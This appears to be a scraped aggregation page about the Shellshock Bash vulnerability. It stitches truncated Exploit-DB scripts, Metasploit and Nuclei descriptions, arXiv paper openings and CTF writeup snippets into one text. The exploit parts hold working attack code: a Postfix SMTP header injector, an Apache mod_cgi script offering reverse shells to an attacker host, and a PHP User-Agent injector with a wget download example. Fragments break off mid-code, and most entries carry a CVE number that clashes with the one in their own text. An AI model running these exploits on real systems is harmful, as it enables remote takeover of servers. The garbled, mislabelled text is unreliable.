['URL', 'http://s
Exploit-DB
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
exploitdb·2014-10-06
CVE-2014-7910 Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
Postfix SMTP 4.2.x "
argc = len(sys.argv)
if(argc 3):
usage()
sys.exit(0)
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
# banner grab
s.recv(2048*4)
def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
data = netFormat("rcpt to:")
s.send(data)
s.recv(2048*4)
data = netFormat("data")
s.send(data)
s.recv(2048*4)
data = ''
for h in headers:
data += netFormat(h + ":() { :; };" + cmd)
data += netFormat(cmd)
# .
data += "0d0a2e0d0a".decode('hex')
s.send(data)
s.recv(2048*4)
data = netFormat("
Exploit-DB
Apache mod_cgi - 'Shellshock' Remote Command Injection
exploitdb·2014-10-06
CVE-2014-6278 Apache mod_cgi - 'Shellshock' Remote Command Injection
Apache mod_cgi - 'Shellshock' Remote Command Injection
---
#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages: specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payl
Exploit-DB
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)
exploitdb·2014-10-06
CVE-2014-7910 Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Shellshock Bashed CGI RCE',
'Description' => %q{
This module exploits the shellshock vulnerability in apache cgi. It allows you to
excute any metasploit payload you want.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6271' ]
],
'Payload' =>
{
'BadChars' => "",
},
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'Disclosure
Exploit-DB
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection
exploitdb·2014-10-04·CVSS 9.8
CVE-2014-7910 [CRITICAL] OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection
---
# Exploit Title: ShellShock OpenVPN Exploit
# Date: Fri Oct 3 15:48:08 EDT 2014
# Exploit Author: hobbily AKA @fj33r
# Version: 2.2.29
# Tested on: Debian Linux
# CVE : CVE-2014-6271
#Probably should of submitted this the day I tweeted it.
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
### user.sh
#!/bin/bas
Exploit-DB
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)
exploitdb·2014-10-02
CVE-2014-7910 Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6
Exploit-DB
GNU bash 4.3.11 - Environment Variable dhclient
exploitdb·2014-10-02·CVSS 10.0
CVE-2014-7910 [CRITICAL] GNU bash 4.3.11 - Environment Variable dhclient
GNU bash 4.3.11 - Environment Variable dhclient
---
#!/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
# ______ ______ ______ _
# / __ | / __ |/ __ | _ (_)
#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
# (_____|
# _ _ _ _
# | | | | (_) _
# _ | | | _ ____| |_ ____ ____ | |_
# / || | || \ / ___) | |/ _ ) _ \|
Exploit-DB
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
exploitdb·2014-10-01·CVSS 9.8
CVE-2014-7910 [CRITICAL] IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
---
#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
# It can be maintained via a web interface.
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
# IPFire is based on Linux From Scratch and is, like the Endian Fi
Exploit-DB
GNU Bash - Environment Variable Command Injection (Metasploit)
exploitdb·2014-09-25·CVSS 9.8
CVE-2014-7910 [CRITICAL] GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection (Metasploit)
---
require 'msf/core'
class Metasploit3 'bashedCgi',
'Description' => %q{
Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Shaun Colley ' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [ 'CVE', '2014-6271' ],
'Targets' =>
[
[ 'cgi', {} ]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' => { 'PAYLOAD' => 0 }
))
register_options(
[
OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
], s
Exploit-DB
Bash - 'Shellshock' Environment Variables Command Injection
exploitdb·2014-09-25
CVE-2014-7910 Bash - 'Shellshock' Environment Variables Command Injection
Bash - 'Shellshock' Environment Variables Command Injection
---
/cgi-bin/ -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
$req = file_get_contents($url, fa
Exploit-DB
GNU Bash - 'Shellshock' Environment Variable Command Injection
exploitdb·2014-09-25
CVE-2014-7910 GNU Bash - 'Shellshock' Environment Variable Command Injection
GNU Bash - 'Shellshock' Environment Variable Command Injection
---
Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched versi
Metasploit
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
metasploit
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.
Nuclei
ShellShock - Remote Code Execution
nuclei·CVSS 9.8
CVE-2014-6271 [CRITICAL] ShellShock - Remote Code Execution
ShellShock - Remote Code Execution
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
Template:
id: CVE-2014-6271
info:
name: ShellShock - Remote Code Execution
author: pentest_swissky,0xelkomy
severity: critical
description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variable
Metasploit
Qmail SMTP Bash Environment Variable Injection (Shellshock)
metasploit
Qmail SMTP Bash Environment Variable Injection (Shellshock)
Qmail SMTP Bash Environment Variable Injection (Shellshock)
This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.
Metasploit
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
metasploit
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.
Metasploit
CUPS Filter Bash Environment Variable Code Injection (Shellshock)
metasploit
CUPS Filter Bash Environment Variable Code Injection (Shellshock)
CUPS Filter Bash Environment Variable Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is required to exploit this vulnerability through CUPS.
Metasploit
DHCP Client Bash Environment Variable Code Injection (Shellshock)
metasploit
DHCP Client Bash Environment Variable Code Injection (Shellshock)
DHCP Client Bash Environment Variable Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.
Metasploit
Dhclient Bash Environment Variable Injection (Shellshock)
metasploit
Dhclient Bash Environment Variable Injection (Shellshock)
Dhclient Bash Environment Variable Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.
Metasploit
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
metasploit
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.
Metasploit
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
metasploit
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.
Metasploit
IPFire Bash Environment Variable Injection (Shellshock)
metasploit
IPFire Bash Environment Variable Injection (Shellshock)
IPFire Bash Environment Variable Injection (Shellshock)
IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.
Metasploit
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
metasploit
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98.
arXiv
Cybersecurity AI: A Game-Theoretic AI for Guiding Attack and Defense
arxiv_fulltext·2026-01-09
Cybersecurity AI: A Game-Theoretic AI for Guiding Attack and Defense
fancy
[L]
[1]#1
RedGCTRHTMLB30000
BlueGCTRHTML3366AA
PurplePlainHTML8B63BE
PurpleCoopHTML663D8C
PurpleMergedHTML4A2C6B
NoGCTRHTMLCCCCCC
-1em
## Abstract
AI-driven penetration testing now executes thousands of actions per hour but still lacks the strategic intuition humans apply in competitive security. To build cybersecurity superintelligence--Cybersecurity AI exceeding best human capability—such strategic intuition must be embedded into agentic reasoning processes. We present Generative Cut-the-Rope (G-CTR), a game-theoretic guidance layer that extracts attack graphs from agent's context, computes Nash equilibria with effort-aware scoring, and feeds a concise digest back into the LLM loop guiding the agent's actions. Across five real-world exercises, G-CTR matches 70--90% of expert g
arXiv
Tracking Down Software Cluster Bombs: A Current State Analysis of the Free/Libre and Open Source Software (FLOSS) Ecosystem
arxiv_fulltext·2025-02-12
Tracking Down Software Cluster Bombs: A Current State Analysis of the Free/Libre and Open Source Software (FLOSS) Ecosystem
frontmatter
Tracking Down Software Cluster Bombs: A Current State Analysis of the Free/Libre and Open Source Software (FLOSS) Ecosystem
[1,2]0000-0002-2288-9010 Stefan Tatschnercor1
[1,3,4]0000-0002-1094-4828 Michael P. Heinl
[2]0009-0008-0767-8208 Nicole Pappler
[1]0009-0001-7615-7579 Tobias Specht
[5]0000-0002-1658-1140 Sven Plaga
[2]0000-0002-3375-8200 Thomas Newe
[cor1]Corresponding author
[1]organization=Fraunhofer AISEC,
city=Garching bei München,
state=Bavaria,
country=Germany
[2]organization=University of Limerick,
city=Limerick,
addressline=V94 T9PX,
country=Ireland
[3]organization=Technical University of Munich,
city=Garching bei München,
state=Bavaria,
country=Germany
[4]organization=Munich University of Applied Sciences HM,
city=Munich,
state=Bavaria,
country=Germany
[5]org
arXiv
Dynamic Neural Control Flow Execution: An Agent-Based Deep Equilibrium Approach for Binary Vulnerability Detection
arxiv_fulltext·2024-04-03
Dynamic Neural Control Flow Execution: An Agent-Based Deep Equilibrium Approach for Binary Vulnerability Detection
Dynamic Neural Control Flow Execution: An Agent-Based Deep Equilibrium Approach for Binary Vulnerability Detection
[1]Litao Li
[1]Steven H. H. Ding
[2]Andrew Walenstein
[3]Philippe Charland
[4]Benjamin C. M. Fung
[1]L1NNA Lab, School of Computing, Queen's University, Canada
[2]BlackBerry Ltd., Canada
[3]Mission Critical Cyber Security Section, Defence R&D Canada
[4]Data Mining and Security (DMaS) Lab, McGill University, Canada
## Abstract
Software vulnerabilities are a challenge in cybersecurity. Manual security patches are often difficult and slow to be deployed, while new vulnerabilities are created. Binary code vulnerability detection is less studied and more complex compared to source code, and this has important practical implications. Deep learning has become an efficient and powe
arXiv
Cybersecurity as a Service
arxiv_fulltext·2024-02-21
Cybersecurity as a Service
Cybersecurity as a Service
John Morris^* Stefan Tatschner^* Michael P. Heinl Patrizia Heinl Thomas Newe Sven Plaga
*These authors contributed equally to this work.
Authors:
- John Morris^*; Department of Electronic and Computer Engineering, University of Limerick, Ireland; [email protected]; ORCID: https://orcid.org/0000-0003-2811-1055
- Stefan Tatschner^* Fraunhofer AISEC, Department Product Protection and Industrial Security, Germany; Department of Electronic and Computer Engineering, University of Limerick, Ireland; Confirm, the SFI Centre for Smart Manufacturing, Ireland;
[email protected]; ORCID: https://orcid.org/0000-0002-2288-9010
- Michael P. Heinl; Fraunhofer AISEC, Department Product Protection and Industrial Security, Germany; [email protected]
arXiv
Intrusion Prevention through Optimal Stopping
arxiv_fulltext·2022-04-01
Intrusion Prevention through Optimal Stopping
MyBSTcontrol
Intrusion Prevention through Optimal Stopping
Kim Hammar 23 and Rolf Stadler23
2
Division of Network and Systems Engineering, KTH Royal Institute of Technology, Sweden
3 KTH Center for Cyber Defense and Information Security, Sweden
Email: \kimham, stadler\@kth.se
2022 IEEE; This work has been submitted to the IEEE for possible publication. Copyright may be transferred without notice.
## Abstract
We study automated intrusion prevention using reinforcement learning. Following a novel approach, we formulate the problem of intrusion prevention as an (optimal) multiple stopping problem. This formulation gives us insight into the structure of optimal policies, which we show to have threshold properties. For most practical cases, it is not feasible to obtain an optimal defende
arXiv
threaTrace: Detecting and Tracing Host-based Threats in Node Level Through Provenance Graph Learning
arxiv_fulltext·2021-11-08
threaTrace: Detecting and Tracing Host-based Threats in Node Level Through Provenance Graph Learning
threaTrace: Detecting and Tracing Host-based Threats in Node Level Through Provenance Graph Learning
Su Wang,
Zhiliang Wang, Member, IEEE,
Tao Zhou,
Xia Yin, Senior Member, IEEE,
Dongqi Han,
Han Zhang,
Hongbin Sun,
Xingang Shi, Member, IEEE,
Jiahai Yang, Senior Member, IEEE
Journal of \ Class Files, Vol. 14, No. 8, August 2015
Shell et al.: Bare Demo of IEEEtran.cls for IEEE Journals
## Abstract
Host-based threats such as Program Attack, Malware Implantation, and Advanced Persistent Threats (APT), are commonly adopted by modern attackers. Recent studies propose leveraging the rich contextual information in data provenance to detect threats in a host. Data provenance is a directed acyclic graph constructed from system audit data. Nodes in a provenance graph represent system entities (e.
arXiv
DualNet: Locate Then Detect Effective Payload with Deep Attention Network
arxiv_fulltext·2020-10-23
DualNet: Locate Then Detect Effective Payload with Deep Attention Network
DualNet: Locate Then Detect Effective Payload
with Deep Attention Network
Shiyi Yang1, Peilun Wu2 and Hui Guo3
School of Computer Science and Engineering, University of New South Wales, Sydney123
Innovation Institute, Sangfor Technologies Inc.2
Email: [email protected],
[email protected], [email protected]
## Abstract
Network intrusion detection (NID) is an essential defense strategy that is used to discover the trace of suspicious user behaviour in large-scale cyberspace, and machine learning (ML), due to its capability of automation and intelligence, has been gradually adopted as a mainstream hunting method in recent years.
However, traditional ML based network intrusion detection systems (NIDSs) are not effective to recognize unknown threats and their high detection
arXiv
UNICORN: Runtime Provenance-Based Detector for Advanced Persistent Threats
arxiv_fulltext·2020-01-14
UNICORN: Runtime Provenance-Based Detector for Advanced Persistent Threats
mydefinitionDefinition
esp.\@
CamQuery
CamFlow
Unicorn
L
Fig.
Table
Alg.
* Listing
* [1] [baseline=(char.base)]
[shape=circle,draw,inner sep=0pt] (char) #1;
: Runtime Provenance-Based Detector for Advanced Persistent Threats
[
hidealllines=true,
leftline=true,
innertopmargin=0pt,
innerbottommargin=0pt,
linewidth=2pt,
linecolor=gray!40,
innerrightmargin=0pt,
]definitioniiDefinition
\@IEEEpubidpullup6.5
Network and Distributed Systems Security (NDSS) Symposium 2020
23-26 February 2020, San Diego, CA, USA
ISBN 1-891562-61-4
https://dx.doi.org/10.14722/ndss.2020.24046
www.ndss-symposium.org
[ ]
Xueyuan Han1,
Thomas Pasquier2,
Adam Bates3,
James Mickens1 and
Margo Seltzer4
1Harvard University
\hanx,mickens\@g.harvard.edu
2University of Bristol
[email protected]
3Univer
arXiv
SAFE: Self-Attentive Function Embeddings for Binary Similarity
arxiv_fulltext·2019-12-19
SAFE: Self-Attentive Function Embeddings for Binary Similarity
for Binary Similarity
Luca Massarelli^ , Giuseppe Antonio Di Luna^ , Fabio Petroni^*,
Leonardo Querzoni^ , Roberto Baldoni^
: University of Rome Sapienza. \massarelli, querzoni, baldoni\@diag.uniroma1.it.
: CINI, National Laboratory of Cyber Security. [email protected].
*: Facebook AI Research, [email protected].
## Abstract
The binary similarity problem consists in determining if two functions are similar by only considering their compiled form. Advanced techniques for binary similarity recently gained momentum as they can be applied in several fields, such as copyright disputes, malware analysis, vulnerability detection, etc., and thus have an immediate practical impact. Current solutions compare functions by first transforming their binary code in multi-dimensional vector repres
arXiv
Tiresias: Predicting Security Events Through Deep Learning
arxiv_fulltext·2019-05-24
Tiresias: Predicting Security Events Through Deep Learning
et al.
e.g.,
i.e.,
10.1145/3243734.3243811
2018
2018
acmlicensed
[CCS '18]2018 ACM SIGSAC Conference on Computer and Communications SecurityOctober 15--19, 2018Toronto, ON, Canada
2018 ACM SIGSAC Conference on Computer and Communications Security (CCS '18), October 15--19, 2018, Toronto, ON, Canada
15.00
: Predicting Security Events Through Deep Learning
Yun Shen^ , Enrico Mariconti^ , Pierre-Antoine Vervier^ , and Gianluca Stringhini^
^ Symantec Research Labs, ^ University College London, ^ Boston University
\yun_shen,pierre-antoine_vervier\@symantec.com, [email protected], [email protected]
## Abstract
With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps tha
arXiv
Identifying Relevant Information Cues for Vulnerability Assessment Using CVSS
arxiv_fulltext·2018-03-20
Identifying Relevant Information Cues for Vulnerability Assessment Using CVSS
Identifying Relevant Information Cues for Vulnerability Assessment Using
Luca Allodi
0000-0003-1600-0868
Eindhoven University of Technology
De Zaale, Eindhoven, The Netherlands, 5600 MB
[email protected]
Sebastian Banescu\ Femmer
Munich Technical University
Munich, DE
[email protected]
Kristian Beckers
Social Engineering Academy (SEA) GmbH
Frankfurt am Main, DE
[email protected]
L. Allodi et al.
## Abstract
The assessment of new vulnerabilities is an activity that accounts for information from several data sources and produces a `severity' score for the vulnerability. The Common Vulnerability Scoring System ( ) is the reference standard for this assessment. Yet, no guidance currently exists on which information aids a correct assessment and should the
arXiv
A Survey on Honeypot Software and Data Analysis
arxiv_fulltext·2016-08-22
A Survey on Honeypot Software and Data Analysis
## Abstract
In this survey, we give an extensive overview on honeypots.
This includes not only honeypot software but also methodologies to analyse honeypot data.
## Introduction
Effective network security administration depends to a great extent on the
understanding of existing and emerging threats on the Internet. In order to
protect information systems and its users it is of crucial importance to collect
accurate, concise, high-quality information about malicious activities
. The fact that cyber attacks are a
present threat is confirmed by recent statistics such as the Symantec Internet
Security Threat Report or the attacks report by
ATLAS . The discovery of vulnerabilities
such as Heartbleed, ShellShock, and Poodle, and
their wide-spread prevalence across a number of operating system
CTF
010. shellshock / README
ctf_writeups·CVSS 9.8
CVE-2014-6271 [CRITICAL] 010. shellshock / README
# shellshock exploit
```
junhoyeo@Macbookui-MacBook-Pro ~/Documents/pwnable.kr/10. shellshock master ● python2 exploit.py2
[+] Connecting to pwnable.kr on port 2222: Done
[!] Couldn't check security settings on 'pwnable.kr'
[+] Downloading './shellshock.c' to 'shellshock.c': Found '/home/shellshock/shellshock.c' in ssh cache
[+] Starting remote process './shellshock' on pwnable.kr: pid 63695
[*] FLAG : only if I knew CVE-2014-6271 ten years ago..!!
```
CVE-2014-6271(shellshock) 취약점에 관한 문제다.
CTF
attack-paths
ctf_writeups·CVSS 6.0
[MEDIUM] attack-paths
---
layout: default
title: Attack Paths
nav_order: 8
description: "Visual attack path flowcharts for popular HTB machines - from reconnaissance to root"
permalink: /attack-paths/
---
# Attack Path Diagrams
{: .fs-9 }
Visual flowcharts mapping the complete attack chain for 30 popular Hack The Box machines, from initial reconnaissance to root/SYSTEM.
{: .fs-6 .fw-300 }
---
## How to Read These Diagrams
Each diagram traces the full exploitation path for a machine using a top-down flowchart. The color coding indicates the phase of the attack:
- **Green nodes** - Reconnaissance and enumeration
- **Orange nodes** - Initial access / foothold
- **Blue nodes** - Post-exploitation and lateral movement
- **Red nodes** - Privilege escalation
- **Purple nodes** - Root or SYSTEM achieved
Nodes in
CTF
06. Introduction to Web Applications / Introduction to Web Applications
ctf_writeups
06. Introduction to Web Applications / Introduction to Web Applications
# Introduction to Web Applications
Tags: #🧑🎓
Related to:
See also:
Previous: [[HTB Academy]]
![[logo_introduction_to_web_applications.png]]
In the Introduction to Web Applications module, you will learn all of the basics of how web applications work and begin to look at them from an information security perspective.
### Module Summary
This module is your first step in starting web application pentesting. It teaches important aspects of web applications, which will help you understand how web application pentesting works.
This module will cover the following topics:
Intro to Web Applications
- Intro to Web Applications
- Web Application Architectures
- Front-end vs. Back-end
Front-end Components
- HTML
- CSS
- JavaScript
Front-end vulnerabilities
- Data Exposure
- HTML Injectio
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
README
ctf_writeups·CVSS 9.8
[CRITICAL] README
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
CTF
cert-prep / README
ctf_writeups·CVSS 6.0
[MEDIUM] cert-prep / README
---
layout: default
title: Cert Prep
parent: Resources
nav_order: 3
description: "OSCP, CPTS, CRTO, CRTE, eWPT certification preparation with HTB"
permalink: /resources/cert-prep/
---
# Certification Preparation with HTB
Map your HTB journey to professional security certifications.
## Certification Paths
### OSCP (Offensive Security Certified Professional)
The gold standard for penetration testing. Focus on manual exploitation, no automated tools.
**Recommended Easy Machines:**
| Machine | OS | Key Skills | Writeup |
|---------|-----|-----------|----------|
| [Lame](https://0xdf.gitlab.io/2020/04/07/htb-lame.html) | Linux | Samba RCE (CVE-2007-2447) | [0xdf](https://0xdf.gitlab.io/2020/04/07/htb-lame.html) |
| [Legacy](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html) | Windows | M
Talos
AI-powered honeypots: Turning the tables on malicious AI agents
blogs_talos·2026-04-29
CVE-2014-6271 AI-powered honeypots: Turning the tables on malicious AI agents
## AI-powered honeypots: Turning the tables on malicious AI agents
Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT) devices, using simple text prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods.
AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might otherwise overwhelm human teams.
This method shifts the strategy from merely detecting attacks to actively manipulating and misleading threat actors. Organizations can safely observe attacker methodologies in real-time within a control
Trendmicro
